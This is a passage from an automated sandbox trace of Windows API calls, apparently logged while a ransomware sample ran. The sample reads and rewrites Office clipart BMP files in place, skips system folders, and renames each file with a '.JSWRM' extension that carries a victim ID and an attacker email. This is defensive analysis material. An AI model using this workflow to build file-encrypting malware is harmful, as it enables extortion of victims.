lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0094.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0094.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02753U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02753U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02753U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0094.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0094.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0094.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02753u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.021] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=108216) returned 1 [0095.021] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a6b0) returned 0x24d210 [0095.022] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1a6b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1a6b0, lpOverlapped=0x0) returned 1 [0095.030] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.030] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1a6b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1a6b0, lpOverlapped=0x0) returned 1 [0095.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.032] CloseHandle (hObject=0x314) returned 1 [0095.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0095.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0095.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0095.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0095.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0095.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0095.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.032] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02753u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02753u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0095.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0095.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0095.034] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a7d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02754U.BMP", cAlternateFileName="")) returned 1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2=".") returned 1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="..") returned 1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="...") returned 1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="windows") returned -1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="recovery") returned -1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="perflogs") returned 1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="documents and settings") returned 1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="system volume information") returned -1 [0095.034] lstrcmpiW (lpString1="PH02754U.BMP", lpString2="msocache") returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0095.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02754U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02754U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02754U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02754U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02754U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02754U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.035] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=108504) returned 1 [0095.035] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a7d0) returned 0x24d210 [0095.036] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1a7d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1a7d0, lpOverlapped=0x0) returned 1 [0095.044] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.045] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1a7d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1a7d0, lpOverlapped=0x0) returned 1 [0095.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.046] CloseHandle (hObject=0x314) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0095.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0095.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0095.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0095.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.046] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0095.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.047] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a7d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02755U.BMP", cAlternateFileName="")) returned 1 [0095.047] lstrcmpiW (lpString1="PH02755U.BMP", lpString2=".") returned 1 [0095.047] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="..") returned 1 [0095.047] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="...") returned 1 [0095.047] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="windows") returned -1 [0095.047] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="recovery") returned -1 [0095.047] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="perflogs") returned 1 [0095.047] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="documents and settings") returned 1 [0095.048] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0095.048] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="system volume information") returned -1 [0095.048] lstrcmpiW (lpString1="PH02755U.BMP", lpString2="msocache") returned 1 [0095.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02755U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02755U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02755U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0095.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02755U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02755U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02755U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0095.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0095.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02755u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.048] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=108504) returned 1 [0095.048] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a7d0) returned 0x24d210 [0095.049] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1a7d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1a7d0, lpOverlapped=0x0) returned 1 [0095.059] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.059] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1a7d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1a7d0, lpOverlapped=0x0) returned 1 [0095.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.060] CloseHandle (hObject=0x314) returned 1 [0095.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0095.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0095.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0095.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0095.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0095.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0095.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.061] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02755u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02755u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0095.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0095.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.061] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30408, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02756U.BMP", cAlternateFileName="")) returned 1 [0095.061] lstrcmpiW (lpString1="PH02756U.BMP", lpString2=".") returned 1 [0095.061] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="..") returned 1 [0095.061] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="...") returned 1 [0095.062] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="windows") returned -1 [0095.062] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="recovery") returned -1 [0095.062] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="perflogs") returned 1 [0095.062] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="documents and settings") returned 1 [0095.062] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0095.062] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="system volume information") returned -1 [0095.062] lstrcmpiW (lpString1="PH02756U.BMP", lpString2="msocache") returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02756U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02756U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02756U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0095.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02756U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02756U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02756U.BMP", lpUsedDefaultChar=0x0) returned 12 [0095.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0095.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0095.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02756u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 